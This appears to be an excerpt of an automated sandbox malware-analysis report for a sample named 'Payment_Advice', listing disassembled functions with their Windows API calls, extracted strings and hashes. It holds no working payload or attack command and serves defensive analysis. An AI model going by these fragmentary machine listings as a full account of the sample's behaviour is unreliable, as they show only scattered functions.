                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                    • String ID:
                                                                                                    • API String ID: 1353541977-0
                                                                                                    • Opcode ID: 56b4bcb4575aa63d42be57fa903ff8bcf4f59d36c120e175b69609065898ea68
                                                                                                    • Instruction ID: ee52bdeb7b3fa32b17a71f44fe2f94b48920fb29c07b9333cbc9cb7272c5eaaa
                                                                                                    • Opcode Fuzzy Hash: 56b4bcb4575aa63d42be57fa903ff8bcf4f59d36c120e175b69609065898ea68
                                                                                                    • Instruction Fuzzy Hash: 2241B775A00215ABEB109F64D849BEEBFA8FB44710F104239F905E7291D7349984D7E5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                    • API String ID: 3519838083-3505469590
                                                                                                    • Opcode ID: f542206f332b8aca56483f88fcf29ca42de530d361fb234aebf385cf0ebf0652
                                                                                                    • Instruction ID: 45fc588737409fa5eb011450ba84c43240cea54c6eb4294b342d617c1a6da9fb
                                                                                                    • Opcode Fuzzy Hash: f542206f332b8aca56483f88fcf29ca42de530d361fb234aebf385cf0ebf0652
                                                                                                    • Instruction Fuzzy Hash: D3717E75A0021AAFEB14DF64CC999AFBBB9FF48710B14055DF512E72A0CB306E45DB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00509387
                                                                                                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 005093AA
                                                                                                    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 005093C9
                                                                                                      • Part of subcall function 0050C29A: _wcslen.LIBCMT ref: 0050C2A2
                                                                                                      • Part of subcall function 00511FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0050C116,00000000,.exe,?,?,00000800,?,?,?,00518E3C), ref: 00511FD1
                                                                                                    • _swprintf.LIBCMT ref: 00509465
                                                                                                      • Part of subcall function 00504092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005040A5
                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 005094D4
                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00509514
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                    • String ID: rtmp%d
                                                                                                    • API String ID: 3726343395-3303766350
                                                                                                    • Opcode ID: ed96bc5c227149f5e19b36e140893de21cbe8523d1b04b98856c8e0a8f33a881
                                                                                                    • Instruction ID: daf3c493c96a14b4b17a55454c2c0e0d4dcfcdf38048389723015ba6cf26c370
                                                                                                    • Opcode Fuzzy Hash: ed96bc5c227149f5e19b36e140893de21cbe8523d1b04b98856c8e0a8f33a881
                                                                                                    • Instruction Fuzzy Hash: B74198B190025A66DF21EBA1CC49DDE7B7CBF81344F0048A5B649E3096DB388BC99B60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID: UQ$pQ$zQ
                                                                                                    • API String ID: 176396367-1608347092
                                                                                                    • Opcode ID: c85ee76291f009886d6a09263ef4c0d83461f15d99de0128b8ada3f45e0a490a
                                                                                                    • Instruction ID: d8283f57c72757004424760ffce4a6a1d7f741cf0c9d3dbc088bacf55f39cc33
                                                                                                    • Opcode Fuzzy Hash: c85ee76291f009886d6a09263ef4c0d83461f15d99de0128b8ada3f45e0a490a
                                                                                                    • Instruction Fuzzy Hash: 9641C37190066A9BDB219F68CC0A9EF7FB8FF41310F000019FD45E7285DA74AE898BA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00519EEE
                                                                                                    • GetWindowRect.USER32(?,00000000), ref: 00519F44
                                                                                                    • ShowWindow.USER32(?,00000005,00000000), ref: 00519FDB
                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00519FE3
                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00519FF9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Show$RectText
                                                                                                    • String ID: Q$RarHtmlClassName
                                                                                                    • API String ID: 3937224194-4289036385
                                                                                                    • Opcode ID: a13040a592d3dd4037a64de0a652f6c6b69b4b15aef243451a8c3c58b82ab587
                                                                                                    • Instruction ID: 4022618b224e75c982edbc5e9ef95a281e1a81d3b8641e47c4781248a3df5bdf
                                                                                                    • Opcode Fuzzy Hash: a13040a592d3dd4037a64de0a652f6c6b69b4b15aef243451a8c3c58b82ab587
                                                                                                    • Instruction Fuzzy Hash: 3641E231404210AFEB229F68DC4CBABBFA8FF59711F004558F8499A052DB74EA89DF61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __aulldiv.LIBCMT ref: 0051122E
                                                                                                      • Part of subcall function 0050B146: GetVersionExW.KERNEL32(?), ref: 0050B16B
                                                                                                    • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00511251
                                                                                                    • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00511263
                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00511274
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00511284
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00511294
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 005112CF
                                                                                                    • __aullrem.LIBCMT ref: 00511379
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                    • String ID:
                                                                                                    • API String ID: 1247370737-0
                                                                                                    • Opcode ID: db603d39b6e8efb195d50581ccbd358a1d2a588fa45022188c6a506035829771
                                                                                                    • Instruction ID: fa5e2286fd8d8c204862f7d3814473df6c2b189fb0330ada100be996f0230008
                                                                                                    • Opcode Fuzzy Hash: db603d39b6e8efb195d50581ccbd358a1d2a588fa45022188c6a506035829771
                                                                                                    • Instruction Fuzzy Hash: 624107B1508305AFD710DF65C8849ABBBE9FB88314F008D2EF596C2210E738E649DB66
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • _swprintf.LIBCMT ref: 00502536
                                                                                                      • Part of subcall function 00504092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005040A5
                                                                                                      • Part of subcall function 005105DA: _wcslen.LIBCMT ref: 005105E0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                                    • String ID: ;%u$x%u$xc%u
                                                                                                    • API String ID: 3053425827-2277559157
                                                                                                    • Opcode ID: c4ad530ce98c8d122bdd6cf70726807b13e061a042b1133ba8f30b525f7f86bd
                                                                                                    • Instruction ID: 3a70f7c2d6f2b2edbcdb656bf33f58321ff1446e66d99c32d707fba4bc091328
                                                                                                    • Opcode Fuzzy Hash: c4ad530ce98c8d122bdd6cf70726807b13e061a042b1133ba8f30b525f7f86bd
                                                                                                    • Instruction Fuzzy Hash: D5F1E5706043419BDB25DB24C49EBEE7F997FD1300F084A6DED8A9B2C3CB649D498762
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID: </p>$</style>$<br>$<style>$>
                                                                                                    • API String ID: 176396367-3568243669
                                                                                                    • Opcode ID: 21568996543fc41b39f067d1447778a8e078d3575e5ef6eb232f564513ae75f8
                                                                                                    • Instruction ID: 13c6efa31b4b880cd10cc0ea95a883fc78f4a5a564e5565b62af717c2561cea2
                                                                                                    • Opcode Fuzzy Hash: 21568996543fc41b39f067d1447778a8e078d3575e5ef6eb232f564513ae75f8
                                                                                                    • Instruction Fuzzy Hash: C9512D6A74032395FB349A15E8317F67BE4FFA1790F59091AF9C18B1C0FB658CC182A1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0052FE02,00000000,00000000,00000000,00000000,00000000,0052529F), ref: 0052F6CF
                                                                                                    • __fassign.LIBCMT ref: 0052F74A
                                                                                                    • __fassign.LIBCMT ref: 0052F765
                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0052F78B
                                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,0052FE02,00000000,?,?,?,?,?,?,?,?,?,0052FE02,00000000), ref: 0052F7AA
                                                                                                    • WriteFile.KERNEL32(?,00000000,00000001,0052FE02,00000000,?,?,?,?,?,?,?,?,?,0052FE02,00000000), ref: 0052F7E3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 1324828854-0
                                                                                                    • Opcode ID: d0284fd9ce6b084448296a9281fef565d475d080b14f3c330da6e76060812302
                                                                                                    • Instruction ID: 2896ddabf01acd8d20f12603a89a1242f3812c26a88ecdc43d8b178f097a6a1c
                                                                                                    • Opcode Fuzzy Hash: d0284fd9ce6b084448296a9281fef565d475d080b14f3c330da6e76060812302
                                                                                                    • Instruction Fuzzy Hash: EB5191B1D002599FCB10CFA8E885AEEFFF4FF19300F14416AE555E7291E670AA45CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00522937
                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0052293F
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 005229C8
                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 005229F3
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00522A48
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                    • String ID: csm
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 0052C868: _free.LIBCMT ref: 0052C891
                                                                                                    • _free.LIBCMT ref: 0052C8F2
                                                                                                      • Part of subcall function 00528DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0052C896,?,00000000,?,00000000,?,0052C8BD,?,00000007,?,?,0052CCBA,?), ref: 00528DE2
                                                                                                      • Part of subcall function 00528DCC: GetLastError.KERNEL32(?,?,0052C896,?,00000000,?,00000000,?,0052C8BD,?,00000007,?,?,0052CCBA,?,?), ref: 00528DF4
                                                                                                    • _free.LIBCMT ref: 0052C8FD
                                                                                                    • _free.LIBCMT ref: 0052C908
                                                                                                    • _free.LIBCMT ref: 0052C95C
                                                                                                    • _free.LIBCMT ref: 0052C967
                                                                                                    • _free.LIBCMT ref: 0052C972
                                                                                                    • _free.LIBCMT ref: 0052C97D
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0051E669,0051E5CC,0051E86D), ref: 0051E605
                                                                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0051E61B
                                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0051E630
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 0052891E
                                                                                                      • Part of subcall function 00528DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0052C896,?,00000000,?,00000000,?,0052C8BD,?,00000007,?,?,0052CCBA,?), ref: 00528DE2
                                                                                                      • Part of subcall function 00528DCC: GetLastError.KERNEL32(?,?,0052C896,?,00000000,?,00000000,?,0052C8BD,?,00000007,?,?,0052CCBA,?,?), ref: 00528DF4
                                                                                                    • _free.LIBCMT ref: 00528930
                                                                                                    • _free.LIBCMT ref: 00528943
                                                                                                    • _free.LIBCMT ref: 00528954
                                                                                                    • _free.LIBCMT ref: 00528965
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID: pS
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 005114C2
                                                                                                      • Part of subcall function 0050B146: GetVersionExW.KERNEL32(?), ref: 0050B16B
                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 005114E6
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00511500
                                                                                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00511513
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00511523
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00511533
                                                                                                    Similarity
                                                                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                                                                    • String ID:
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,00522AF1,005202FC,0051FA34), ref: 00522B08
                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00522B16
                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00522B2F
                                                                                                    • SetLastError.KERNEL32(00000000,00522AF1,005202FC,0051FA34), ref: 00522B81
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                    • String ID:
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,00541098,00524674,00541098,?,?,005240EF,?,?,00541098), ref: 005297E9
                                                                                                    • _free.LIBCMT ref: 0052981C
                                                                                                    • _free.LIBCMT ref: 00529844
                                                                                                    • SetLastError.KERNEL32(00000000,?,00541098), ref: 00529851
                                                                                                    • SetLastError.KERNEL32(00000000,?,00541098), ref: 0052985D
                                                                                                    • _abort.LIBCMT ref: 00529863
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                    • String ID:
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0051DC47
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0051DC61
                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0051DC72
                                                                                                    • TranslateMessage.USER32(?), ref: 0051DC7C
                                                                                                    • DispatchMessageW.USER32(?), ref: 0051DC86
                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0051DC91
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                    • String ID:
                                                                                                    • API String ID: 2148572870-0
                                                                                                    • Opcode ID: 790e3d1ffcf784145aea9fe51501aa30cb64c82102089a46e53273ff284681f9
                                                                                                    • Instruction ID: cbe60d9d81ef40de8526f6d329a92ebeef8d137c45d4fc5e0e4fd1619c6f8294
                                                                                                    • Opcode Fuzzy Hash: 790e3d1ffcf784145aea9fe51501aa30cb64c82102089a46e53273ff284681f9
                                                                                                    • Instruction Fuzzy Hash: D3F03C72A01219BBCB206BA5DC4CDCB7F7DEF527A1B004421F50AD2050D675868ED7F0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 0051A699: GetDC.USER32(00000000), ref: 0051A69D
                                                                                                      • Part of subcall function 0051A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0051A6A8
                                                                                                      • Part of subcall function 0051A699: ReleaseDC.USER32(00000000,00000000), ref: 0051A6B3
                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 0051A83C
                                                                                                      • Part of subcall function 0051AAC9: GetDC.USER32(00000000), ref: 0051AAD2
                                                                                                      • Part of subcall function 0051AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0051AB01
                                                                                                      • Part of subcall function 0051AAC9: ReleaseDC.USER32(00000000,?), ref: 0051AB99
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ObjectRelease$CapsDevice
                                                                                                    • String ID: "Q$($AQ
                                                                                                    • API String ID: 1061551593-1104973574
                                                                                                    • Opcode ID: 91237ee5ec0f6bbefe23cd867d6f1d90ba3901931f3e0e24741bb826fa31dd32
                                                                                                    • Instruction ID: 9d34cf0e06068293a69af71dcf3430a56c719ee9dbe6eb1a39372e0486c4670c
                                                                                                    • Opcode Fuzzy Hash: 91237ee5ec0f6bbefe23cd867d6f1d90ba3901931f3e0e24741bb826fa31dd32
                                                                                                    • Instruction Fuzzy Hash: 92910375604340AFE711DF25C84896BBBE8FFD9711F00491EF99AD3220DB70A949DB62
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 005105DA: _wcslen.LIBCMT ref: 005105E0
                                                                                                      • Part of subcall function 0050B92D: _wcsrchr.LIBVCRUNTIME ref: 0050B944
                                                                                                    • _wcslen.LIBCMT ref: 0050C197
                                                                                                    • _wcslen.LIBCMT ref: 0050C1DF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
